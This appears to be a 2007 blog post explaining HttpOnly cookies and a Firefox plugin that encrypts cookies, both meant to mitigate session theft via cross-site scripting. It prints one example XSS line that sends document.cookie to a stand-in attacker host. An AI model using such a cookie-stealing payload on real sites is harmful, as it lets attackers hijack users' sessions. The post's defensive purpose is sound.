January 25, 2007 - 09:25 UTC - Tags: HttpOnly cookie
Vidar wrote an interesting
article pointing me to HTTPOnly-cookies. Microsoft created this extension to the cookie standard, to allow servers to issue cookies with a special HttpOnly-flag. This flag makes the cookie inaccessible to javascript in supported browsers (currently only newer versions of IE supports this feature fully).
The set-cookie header looks like this:
Set-Cookie: USER=123; expires=Wednesday, 09-Nov-99 23:12:40 GMT; HttpOnly
Microsoft has an article about these cookies here:
Mitigating Cross-site Scripting With HTTP-only CookiesThis is really interesting, as it may help to reduce the risk of session stealing. Hackers often exploit cross-site-scripting vulnerabilities to steal cookies by using javascript to send the cookie from the victims browser to a site controlled by attacker:
document.location.href="http://evilhacker/cookiestealer?cookie=" + document.cookie;
Stefan Esser has created a proof-of-concept
Firefox plugin that basically creates an encryption key on first startup, and hooks into the http-pipeline and AES-encrypts/decrypts the cookies. From javascript only the encrypted version of the HttpOnly-cookies are available, and since the key is generated uniquely for each computer, the cookies cannot be used (unless cracked) on other computers.